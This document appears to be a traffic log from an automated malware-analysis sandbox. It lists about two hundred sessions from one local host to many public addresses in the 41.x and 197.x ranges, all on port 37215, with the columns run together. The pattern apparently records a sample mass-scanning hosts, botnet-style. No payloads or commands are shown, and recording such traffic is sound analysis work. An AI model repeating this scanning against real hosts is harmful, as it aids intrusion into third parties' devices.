                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21163192.168.2.153816241.144.35.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21164192.168.2.154436041.22.44.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21165192.168.2.154005441.157.208.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21166192.168.2.154685041.29.1.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21167192.168.2.153374641.185.241.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21168192.168.2.155768841.203.203.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21169192.168.2.154759841.244.66.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21170192.168.2.153658241.246.51.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21171192.168.2.154664241.198.244.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21172192.168.2.153282041.133.151.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21173192.168.2.155069841.144.25.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21174192.168.2.154414241.129.125.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21175192.168.2.153777041.0.217.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21176192.168.2.155593241.242.82.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21177192.168.2.153441641.133.219.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21178192.168.2.153625241.5.167.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21179192.168.2.154476441.252.156.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21180192.168.2.154176041.39.33.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21181192.168.2.155281241.155.38.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21182192.168.2.153802641.136.128.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21183192.168.2.155888641.246.171.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21184192.168.2.154517041.151.70.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21185192.168.2.153819841.81.190.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21186192.168.2.153295041.224.183.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21187192.168.2.155297241.240.153.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21188192.168.2.154215041.234.41.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21189192.168.2.153793841.237.162.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21190192.168.2.155113641.62.148.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21191192.168.2.154189441.35.216.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21192192.168.2.155503041.138.213.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21193192.168.2.153878641.127.203.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21194192.168.2.154058841.38.74.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21195192.168.2.155058441.249.151.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21196192.168.2.155308641.47.129.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21197192.168.2.154425841.50.86.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21198192.168.2.155294841.142.29.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21199192.168.2.154599241.231.22.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21200192.168.2.155928841.61.168.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21201192.168.2.153441841.245.111.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21202192.168.2.155101441.194.33.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21203192.168.2.154964241.19.197.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21204192.168.2.155214441.15.34.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21205192.168.2.155222041.83.222.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21206192.168.2.156084841.97.11.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21207192.168.2.155098641.34.126.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21208192.168.2.154565841.47.47.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21209192.168.2.156020241.166.142.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21210192.168.2.154352841.23.227.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21211192.168.2.153868441.185.180.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21212192.168.2.154823441.75.10.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21213192.168.2.154627641.204.51.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21214192.168.2.154996841.186.4.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21215192.168.2.155570641.90.226.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21216192.168.2.154542041.57.120.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21217192.168.2.155997841.161.144.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21218192.168.2.154460241.135.33.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21219192.168.2.153414641.37.180.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21220192.168.2.155569841.236.188.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21221192.168.2.154330441.189.18.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21222192.168.2.153318041.211.110.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21223192.168.2.155337241.100.185.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21224192.168.2.153715241.242.158.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21225192.168.2.154931441.104.55.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21226192.168.2.154635241.105.54.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21227192.168.2.155967641.241.100.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21228192.168.2.154852441.14.81.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21229192.168.2.153499041.122.107.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21230192.168.2.155534641.151.28.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21231192.168.2.154567641.243.23.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21232192.168.2.155733041.88.141.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21233192.168.2.154966041.175.134.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21234192.168.2.155690841.93.161.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21235192.168.2.154180241.31.68.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21236192.168.2.154180441.3.190.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21237192.168.2.155514241.125.20.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21238192.168.2.155366441.125.234.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21239192.168.2.155949241.8.195.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21240192.168.2.155098241.169.200.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21241192.168.2.155878041.90.193.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21242192.168.2.155246041.71.253.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21243192.168.2.154293241.95.98.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21244192.168.2.154929841.142.49.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21245192.168.2.155916841.161.24.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21246192.168.2.155825041.155.245.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21247192.168.2.153324841.189.49.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21248192.168.2.154322241.155.227.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21249192.168.2.154794241.23.238.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21250192.168.2.156051641.152.43.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21251192.168.2.155640841.156.119.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21252192.168.2.153456641.68.135.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21253192.168.2.156006641.58.3.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21254192.168.2.154019641.99.113.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21255192.168.2.153798641.95.139.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21256192.168.2.155128641.9.99.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21257192.168.2.154941241.235.125.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21258192.168.2.156019841.217.215.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21259192.168.2.153527041.251.134.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21260192.168.2.153561241.26.214.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21261192.168.2.155276641.62.217.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21262192.168.2.155713041.231.84.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21263192.168.2.155841641.78.77.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21264192.168.2.154138641.173.202.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21265192.168.2.155910641.170.161.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21266192.168.2.154668641.208.253.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21267192.168.2.155723841.126.119.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21268192.168.2.156062641.175.186.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21269192.168.2.155786641.77.43.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21270192.168.2.156014041.178.173.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21271192.168.2.153793641.56.232.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21272192.168.2.153367041.125.219.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21273192.168.2.155276241.122.39.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21274192.168.2.155719441.74.157.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21275192.168.2.154927041.251.203.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21276192.168.2.153507241.251.5.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21277192.168.2.153635241.218.22.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21278192.168.2.153336841.155.226.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21279192.168.2.154535441.64.69.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21280192.168.2.153368041.89.202.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21281192.168.2.153928441.18.143.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21282192.168.2.155825641.142.93.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21283192.168.2.154644841.63.195.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21284192.168.2.153867241.51.180.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21285192.168.2.155489041.228.165.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21286192.168.2.154658841.206.114.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21287192.168.2.154934641.2.237.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21288192.168.2.154758041.191.73.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21289192.168.2.153656641.206.96.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21290192.168.2.153787241.99.219.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21291192.168.2.154291841.18.140.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21292192.168.2.155569241.3.243.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21293192.168.2.154248641.114.37.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21294192.168.2.154581241.61.239.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21295192.168.2.153829041.252.219.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21296192.168.2.154144641.144.203.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21297192.168.2.154871241.98.230.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21298192.168.2.154587641.201.190.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21299192.168.2.155847241.196.139.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21300192.168.2.155387041.28.53.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21301192.168.2.155942841.64.172.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21302192.168.2.155425241.39.79.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21303192.168.2.155928841.203.153.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21304192.168.2.153582841.60.97.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21305192.168.2.154679241.199.102.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21306192.168.2.154300241.172.69.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21307192.168.2.153404641.225.251.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21308192.168.2.154831841.80.77.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21309192.168.2.1558032197.184.115.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21310192.168.2.1540468197.166.220.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21311192.168.2.1554074197.119.63.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21312192.168.2.1533388197.176.19.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21313192.168.2.1534370197.171.183.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21314192.168.2.1555054197.211.83.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21315192.168.2.1538356197.198.81.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21316192.168.2.1542324197.242.158.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21317192.168.2.1543468197.56.216.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21318192.168.2.1536170197.154.165.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21319192.168.2.1545358197.90.35.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21320192.168.2.1554318197.44.239.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21321192.168.2.1537092197.169.12.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21322192.168.2.1559818197.38.103.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21323192.168.2.1533018197.182.248.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21324192.168.2.1544926197.164.234.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21325192.168.2.1535700197.74.94.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21326192.168.2.1552298197.123.6.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21327192.168.2.1558336197.77.53.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21328192.168.2.1556806197.181.151.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21329192.168.2.1533256197.237.107.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21330192.168.2.1551978197.2.143.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21331192.168.2.1549426197.63.11.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21332192.168.2.1538324197.200.250.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21333192.168.2.1551422197.221.200.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21334192.168.2.1538432197.150.163.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21335192.168.2.1554940197.37.166.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21336192.168.2.1543762197.225.159.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21337192.168.2.1543334197.20.23.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21338192.168.2.1534176197.200.104.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21339192.168.2.1557112197.136.196.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21340192.168.2.1533960197.14.54.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21341192.168.2.1546274197.213.31.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21342192.168.2.1557812197.143.174.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21343192.168.2.1536622197.39.4.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21344192.168.2.1553140197.209.32.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21345192.168.2.1548518197.32.90.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21346192.168.2.1546918197.114.196.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21347192.168.2.1541820197.133.127.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21348192.168.2.1559130197.26.5.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21349192.168.2.1546262197.151.107.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21350192.168.2.1540364197.79.166.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21351192.168.2.1551998197.0.52.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21352192.168.2.1555160197.175.230.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21353192.168.2.1551778197.10.150.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21354192.168.2.1559116197.42.116.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21355192.168.2.1554810197.200.99.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21356192.168.2.1542186197.91.88.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21357192.168.2.1554542197.190.63.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21358192.168.2.1550342197.96.195.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21359192.168.2.1546922197.12.194.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21360192.168.2.1541610197.126.163.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21361192.168.2.1560686197.219.162.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21362192.168.2.1558958197.26.34.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21363192.168.2.1558480197.186.131.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21364192.168.2.1560372197.226.93.10237215
